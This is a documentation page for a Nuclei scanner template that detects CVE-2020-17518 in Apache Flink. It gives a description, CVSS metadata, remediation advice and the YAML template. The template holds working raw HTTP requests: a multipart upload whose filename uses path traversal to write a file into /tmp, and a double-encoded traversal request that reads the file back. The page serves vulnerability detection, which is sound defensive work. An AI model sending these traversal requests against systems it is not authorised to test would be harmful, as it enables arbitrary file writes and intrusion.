Skip to content
Nuclei Templates

Apache Flink 1.5.1 - Local File Inclusion

ID: CVE-2020-17518

Severity: high

Author: pdteam

Tags: cve2020,cve,lfi,flink,fileupload,vulhub,apache,intrusive

Description

Section titled “Description”

Apache Flink 1.5.1 is vulnerable to local file inclusion because of a REST handler that allows file uploads to an arbitrary location on the local file system through a maliciously modified HTTP HEADER.

YAML Source

Section titled “YAML Source”
id: CVE-2020-17518


info:
  name: Apache Flink 1.5.1 - Local File Inclusion
  author: pdteam
  severity: high
  description: |
    Apache Flink 1.5.1 is vulnerable to local file inclusion because of a REST handler that allows file uploads to an arbitrary location on the local file system through a maliciously modified HTTP HEADER.
  impact: |
    An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.
  remediation: |
    Upgrade Apache Flink to a version that is not affected by the vulnerability (1.5.2 or later).
  reference:
    - https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17518
    - https://lists.apache.org/thread.html/rb43cd476419a48be89c1339b527a18116f23eec5b6df2b2acbfef261%40%3Cdev.flink.apache.org%3E
    - https://lists.apache.org/thread.html/rb43cd476419a48be89c1339b527a18116f23eec5b6df2b2acbfef261@%3Cuser.flink.apache.org%3E
    - https://lists.apache.org/thread.html/rb43cd476419a48be89c1339b527a18116f23eec5b6df2b2acbfef261@%3Cdev.flink.apache.org%3E
    - https://nvd.nist.gov/vuln/detail/CVE-2020-17518
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-17518
    cwe-id: CWE-22,CWE-23
    epss-score: 0.86056
    epss-percentile: 0.98301
    cpe: cpe:2.3:a:apache:flink:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: apache
    product: flink
  tags: cve2020,cve,lfi,flink,fileupload,vulhub,apache,intrusive


http:
  - raw:
      - |
        POST /jars/upload HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y


        ------WebKitFormBoundaryoZ8meKnrrso89R6Y
        Content-Disposition: form-data; name="jarfile"; filename="../../../../../../../tmp/poc"


        {{randstr}}
        ------WebKitFormBoundaryoZ8meKnrrso89R6Y--
      - |
        GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1


    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "{{randstr}}") && status_code == 200'
# digest: 4a0a00473045022008aecb2774ca5fee0603df60ad4e8a7d9255ac2d26998f9c73127621ae30da0a022100d33cadc2727152ab1cbc660b2e9fb155d5fd2aa10f4b001ee1252be48211d99d:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-17518.yaml"

View on Github